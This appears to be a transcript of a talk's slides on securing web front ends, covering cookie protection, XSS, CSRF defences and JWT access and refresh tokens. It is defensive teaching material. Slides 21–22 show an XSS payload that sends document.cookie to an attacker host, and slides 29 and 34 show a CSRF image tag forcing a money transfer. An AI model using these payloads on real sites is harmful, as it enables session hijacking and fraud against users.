Building Secure User Interfaces With JWTs
-
Upload
robertjd -
Category
Engineering
-
view
541 -
download
1
Transcript of Building Secure User Interfaces With JWTs
![Page 1: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/1.jpg)
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Robert Damphousse @robertjd_
Lead Front-End Developer, Stormpath
![Page 2: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/2.jpg)
Slideshare URL: http://goo.gl/kXOpgs
![Page 3: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/3.jpg)
About Me
• Full-stack developer 10 years
• Full-stack with JavaScript since 2011
(Node.js + Angular)
• Currently leading JavaScript at Stormpath
![Page 4: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/4.jpg)
About Stormpath
• Cloud-based User Identity API for Developers
• Authentication and Authorization as-as-service
• RESTful API
• Active Directory, LDAP, and SAML Integration
• Private Deployments (AWS)
• Free plan for developers
![Page 5: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/5.jpg)
Talk Overview
• Security Concerns for Modern Web Apps
• Cookies, The Right Way
• Session ID Problems
• Token Authentication to the rescue!
• Angular Examples
![Page 6: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/6.jpg)
Structure of Modern Web Apps
• Back-end: a RESTful JSON API
• Client is usually an HTML5 Environment:
• Single Page Apps (“SPAs”), e.g AngularJS, React
• WebKit instance
• “Hybrid” Mobile apps (Phonegap, etc)
![Page 7: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/7.jpg)
Security Concerns for Modern Web Apps
As a developer, you need to:
• Secure user credentials
• Secure server endpoints (API)
• Prevent malicious code from executing in client
• Provide Access Control information to the Client
![Page 8: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/8.jpg)
The Traditional Solution,
Session Identifiers
![Page 9: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/9.jpg)
We accept username & password, then store a
Session ID in a cookie and associate that
session with the user.
![Page 10: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/10.jpg)
Securing User Credentials: Session ID Cookie
![Page 11: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/11.jpg)
• This is OK if you protect your cookies
• Session ID Session User identity
• Use a web framework like Apache Shiro or
Spring Security to assert security rules, roles
stored in a database.
![Page 12: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/12.jpg)
Session ID Problems
• They’re opaque and have no meaning themselves (they’re just ‘pointers’)
• Session ID look up server state on *every request*.
• Cannot be used for inter-op with other services
• JWTs can help with this, but we’ll still use cookies
![Page 13: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/13.jpg)
Cookies,
The Right Way ®
![Page 14: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/14.jpg)
Cookies, The Right Way ®
Cookies can be easily compromised
• Man-in-the-Middle (MITM)
• Cross-Site Scripting (XSS)
• Cross-Site Request Forgery (CSRF)
![Page 15: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/15.jpg)
Man In The Middle (MITM) Attack
Someone ‘listening on the wire’ between the
browser and server can see and copy the cookie.
Solutions
• Use HTTPS/TLS everywhere a cookie will be in
transit
• Set Secure flag on cookies
![Page 16: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/16.jpg)
Cross-Site Scripting
(XSS)
![Page 17: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/17.jpg)
XSS Attacks
This is a very REAL problem
Happens when someone else can execute
code inside your website
Can be used to steal your cookies!
https://www.owasp.org/index.php/XSS
![Page 18: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/18.jpg)
XSS Attack Demo
https://www.google.com/about/appsecurity/learning/xss/#StoredXSS
![Page 19: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/19.jpg)
XSS Attack Demo
![Page 20: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/20.jpg)
XSS Attack Demo
![Page 21: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/21.jpg)
XSS Attack Demo
<img src=x
onerror="document.body.appendChild(function
(){var a = document.createElement('img');
a.src='https://hackmeplz.com/yourCookies.pn
g/?cookies=’
+document.cookie;return a}())"
So what if I put this in the chatbox..
![Page 22: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/22.jpg)
XSS Attack Demo
GET
https://hackmeplz.com/yourCookies.png/?cook
ies=SessionID=123412341234
Your browser is going to make this request:
Which means..
![Page 23: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/23.jpg)
![Page 24: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/24.jpg)
XSS Attack – What Can I Do?
Escape Content
• Server-side: Use well-known, trusted libraries to
ensure dynamic HTML does not contain
executable code. Do NOT roll your own.
• Client Side: Escape user input from forms (some
frameworks do this automatically, read docs!)
![Page 25: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/25.jpg)
XSS Attack – What Can I Do?
Use HTTPS-Only cookies
Set the HttpOnly flag on your authentication
cookies.
HttpOnly cookies are NOT accessible by the
JavaScript environment
![Page 26: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/26.jpg)
XSS Attack – What Can I Do?
Read this definitive guide:
https://www.owasp.org/index.php/XSS
![Page 27: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/27.jpg)
Cross-Site Request
Forgery
(CSRF)
![Page 28: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/28.jpg)
Cross-Site Request Forgery (CSRF)
Exploits the fact that HTML tags do NOT follow the
Same Origin Policy when making GET requests
https://www.owasp.org/index.php/Cross-
Site_Request_Forgery_(CSRF)
https://developer.mozilla.org/en-
US/docs/Web/Security/Same-origin_policy
![Page 29: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/29.jpg)
Cross-Site Request Forgery (CSRF)
Example: Attacker puts malicious image into a
web page that the user visits:
<img
src=“https://myapp.com/transferMone
y?to=BadGuy&amount=10000”/>
.. what happens?
![Page 30: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/30.jpg)
Cross-Site Request Forgery (CSRF)
• The browser complies, “The request is going
to myapp.com, so I’ll happily send along your
cookies for myapp.com!”
• Your server trusts the cookies AND the user it
identifies, and transfers the money!
![Page 31: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/31.jpg)
Cross-Site Request Forgery (CSRF)
Solutions:
• Synchronizer Token (for form-based apps)
• Double-Submit Cookie (for modern apps)
• Origin header check (for extra measure)
![Page 32: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/32.jpg)
Double Submit Cookie
• Give client two cookies: (1) Session ID and
(2) a strong random value
• Client sends back the random value in a
custom HTTP header, triggering the Same-
Origin-Policy
![Page 33: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/33.jpg)
http://myapp.com/login
Login
Username
Password
•••••••••••••••
Login
WWW Server
(1) POST /login
(2) 200 OK
Set-Cookie: session=dh7jWkx8fj;
Set-Cookie: xsrf-token=xjk2kzjn4;
http://myapp.com/profile
Kitsch mustache seitan, meggings Portland VHS ethical ugh. Messenger bag pour-over deep v semiotics, Portland before they sold out small batch slow-carb PBR PBR&B chia synth vegan bitters Brooklyn.
(3) GET /profile
(4) 200 OK
Cookie: session=dh7jWkx8fj;
xsrf-token=xjk2kzjn4
X-XSRF-Token: xjk2kzjn4;
Hello, YoCookie
==
Header
?
![Page 34: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/34.jpg)
WWW Server
http://hackerzapp.com/
req.setHeader(‘X-XSRF-
Token’,’stolen token’)
BROWSER ERROR
No 'Access-Control-Allow-
XSRF-Token’ header is
present on the requested
resource.
GET http://myapp.com/profile
http://hackerzapp.com/
<img src=“https://
yoursite.com/
transferMoney?
to=BadGuy&amount=10000”/>
(1) GET /transferMoney?
(2) 400 Invalid Token
Server rejects forged requests, CSRF token header is missing
Browser rejects forged cross-domain AJAX attempts
Cookie: session=dh7jWkx8fj;
xsrf-token=xjk2kzjn4
Cookie
==
Header
?
![Page 35: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/35.jpg)
CORS Warning!
BEWARE OF THIS ADVICE:
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers:*
DISABLES SAME-ORIGIN POLICY
![Page 36: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/36.jpg)
Origin Header check
• Browsers send Origin header
• Tells your server where the request is coming
from
• Cannot be modified by JavaScript
• CAN be modified by a malicious HTTP Proxy
(use HTTPS!)
![Page 37: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/37.jpg)
At Last..
Token Authentication!
![Page 38: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/38.jpg)
We’re about to go from
here:
..to here
![Page 39: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/39.jpg)
Token Auth – All you need to know
Authentication is proving who you are
The token is a way of persisting that proof
JSON Web Tokens (JWTs) are a token format
JWTs are often used for the access token and
refresh token in Oauth2 workflows
![Page 40: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/40.jpg)
JWTs are fun – let’s go!
![Page 41: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/41.jpg)
JSON Web Tokens (JWT)
In the wild they look like just another ugly string:
eyJ0eXAiOiJKV1QiLA0KICJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJqb2UiLA0KICJleHAiOjEzMDA4MTkzODAsDQogImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnVlfQ.dBjftJeZ4CVPmB92K27uhbUJU1p1r_wW1gFWFOEjXk
![Page 42: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/42.jpg)
JSON Web Tokens (JWT)
But they do have a three part structure. Each
part is a Base64-URL encoded string:
eyJ0eXAiOiJKV1QiLA0KICJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJqb2UiLA0KICJleHAiOjEzMDA4MTkzODAsDQogImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnVlfQ.dBjftJeZ4CVPmB92K27uhbUJU1p1r_wW1gFWFOEjXk
Header
Body (‘Claims’)
Cryptographic Signature
![Page 43: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/43.jpg)
JSON Web Tokens (JWT)
Base64-decode the parts to see the contents:
{"typ":"JWT","alg":"HS256"
}
{"iss”:”http://trustyapp.com/”,"exp": 1300819380,“sub”: ”users/8983462”,“scope”: “self api/buy”
}
tß´—™à%O˜v+nî…SZu¯µ€U…8H×
Header
Body (‘Claims’)
Cryptographic Signature
![Page 44: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/44.jpg)
JSON Web Tokens (JWT)
The claims body is the best part! It asserts:
{
"iss": "http://trustyapp.com/",
"exp": 1300819380,
"sub": "users/8983462",
"scope": "self api/buy"
}
Who issued the token
When it expires
Who it represents
What they can do
![Page 45: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/45.jpg)
Issuing JWTs
• User has to present credentials to get a token
(password, api keys).
• Tokens are issued by your server, and signed
with a secret key that is private.
• The client stores the tokens, and uses them to
authenticate requests
![Page 46: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/46.jpg)
Verifying JWTs
• Just check the signature and expiration time!
Stateless authentication!
• Token declares scope, make authorization
decisions locally.
• But.. How to revoke stateless authentication?
![Page 47: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/47.jpg)
Storing JWTs
• Local Storage is not secure (XSS vulnerable)
• Use HttpOnly, Secure cookies to store access tokens in the browser.
• Cookies provide an automatic way of supplying the tokens on requests
• CSRF protection is essential!
![Page 48: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/48.jpg)
JWT + OAuth2
![Page 49: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/49.jpg)
JWT + OAuth2
• OAuth2 (RFC 6749) is an “Authorization
Framework” (and a good sleep aid).
• It defines the “Resource Owner Password
Credentials Grant”
• In other words: exchange username and password
for an access token and refresh token
![Page 50: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/50.jpg)
JWT + OAuth2
• The access token has a short lifetime, and
can use stateless trust – a signed JWT!
• The refresh token has a long lifetime and is
used to obtain more access tokens. Access
tokens should can be revoked (database).
![Page 51: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/51.jpg)
The Access Token and Refresh Token
paradigm is designed to give you control over
the implicit-trust tradeoff that is made with
stateless tokens
![Page 52: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/52.jpg)
Access & Refresh Tokens
Refresh token sets the maximum lifetime of the authenticated context.
Authentication token sets the maximum time of the stateless authentication context
Authentication context is revoked by revoking the refresh token
![Page 53: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/53.jpg)
Examples
• Uber-secure banking application (want to force
user out often):
• Access token TTL = 1 minutes
• Refresh token TTL = 30 minutes
• Mobile/social app (user should “always be logged
in”)
• Access token TTL = 1 hour
• Refresh token TTL = 4 years (lifetime of mobile device)
![Page 54: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/54.jpg)
Demonstrate!
https://github.com/stormpath/express-
stormpath-angular-sample-project
![Page 55: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/55.jpg)
Angular App w/ Login Form
![Page 56: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/56.jpg)
Login makes POST to /login
POST /login
Origin: http://localhost:9000
username=robert%40stormpath.com
&password=robert%40stormpath.com
![Page 57: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/57.jpg)
Server Response
HTTP/1.1 200 OK
set-cookie: access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJ
IUzI1NiJ9.ZJD3YlPMq38IcxN335Umeflnte1nFPDEvoSl26rSXk
g…; Expires=Wed, 13 May 2015 07:15:33 GMT;
HttpOnly;Path=/;
set-cookie: refresh_token=eyJ0iI2NldURFJVJkNZhbGciO
iJIUzI1NiJ9.9ybXBhdGguY29tL3YxL2FwcGxpY2F0aW9ucy8…;
Expires=Wed, 13 Jun 2015 07:15:33 GMT;
HttpOnly;Path=/;
![Page 58: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/58.jpg)
Subsequent Requests
GET http://localhost:9000/api/profile
Cookie:access_token=eyJ0eXAiOiJKV1QiLCJhbGci
OiJIUzI1NiJ9.eyJpc3MiOi92MS9…
Cookie:refresh_token=eyJ0iI2NldURFJVJkNZhbGc
iO1NiJ9.9ybXBhdGguY29tL3YxL2FwcGxpY2F0aW9ucy
8…
![Page 59: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/59.jpg)
Server Request Handler – Auth Logic
• Is the access token valid (signature & expiration)?
• Yes? Allow the request
• No? Try to get a new access token, using the refresh
token
• Did that work?
• Yes? Allow the request, send new access
token on response as cookie
• No? Reject the request, delete refresh token
cookie
![Page 60: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/60.jpg)
Recap
![Page 61: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/61.jpg)
• Cookies need to be secured!
• JWTs are an improvement on the opaque session identifier.
• Access Token + Refresh Token is as useful strategy for scaling.
• OAuth2 will put you to sleep.
![Page 62: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/62.jpg)
Thanks!
![Page 63: Building Secure User Interfaces With JWTs](https://reader034.fdocuments.in/reader034/viewer/2022052318/58efa81e1a28ab776f8b45ef/html5/thumbnails/63.jpg)
Use Stormpath for API Authentication & Security
Our API and libraries give you a cloud-based user database and web application security in no time!
Get started with your free Stormpath developer account:
https://api.stormpath.com/register
Questions?